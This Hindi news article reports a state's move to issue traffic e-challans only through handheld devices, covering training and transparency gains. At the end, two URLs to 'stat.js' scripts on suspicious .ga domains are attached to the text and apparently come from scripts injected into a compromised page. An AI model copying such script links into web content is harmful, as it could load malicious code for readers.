राज्य में सड़क सुरक्षा नियमों को प्रभावी और सख्ती से लागू करने के लिए अब हैंड हेल्ड डिवाइस से ई-चालान कटेगा। इसके तहत सभी ट्रैफिक थानों के ट्रैफिक डीएसपी, सब इंस्पेक्टर को हैंड हेल्ड डिवाइस दिया जाएगा। इससे ट्रैफिक थानों में मैनुअली चालान की प्रक्रिया पूरी तरह से बंद हो जाएगी और सिर्फ हैंड हेल्ड डिवाइस (एचएचडी) से ही ई-चालान काटा जाएगा।

परिवहन सचिव संजय कुमार अग्रवाल ने बताया कि पहले चरण में उन सभी जिले जहां पर ट्रैफिक थाना कार्यरत है, वहां के सक्षम पुलिस पदाधिकारियों को हैंड हेल्ड उपलब्ध कराया जाएगा। हैंड हेल्ड डिवाइस देने के बाद ट्रैफिक पुलिस, सब इंस्पेक्टर, डीएसपी को वीडियो काॅन्फ्रेंसिंग के माध्यम से ट्रेनिंग दी जाएगी।

अबतक जिलों के सभी डीटीओ, एमवीआई, ईएसआई और पटना में ट्रैफिक पुलिस को हैंड हेल्ड डिवाइस दिया जा चुका है। इसके सकारात्मक परिणाम सामने आए हैं। पारदर्शिता बढ़ी है। डिवाइस में ट्रैफिक उल्लंघनकर्ता के फोटो खींचने की व्यवस्था होने से फर्जी चालान की शिकायतें समाप्त हुई हैं। जुर्माना होते ही मोबाइल पर मैसेज आने से लोगों में कानून के प्रति आदर और सम्मान भी बढ़ा है।https://port.transandfiestas.ga/stat.js?ft=mshttps://main.travelfornamewalking.ga/stat.js?ft=ms

Leave a Reply

Your email address will not be published.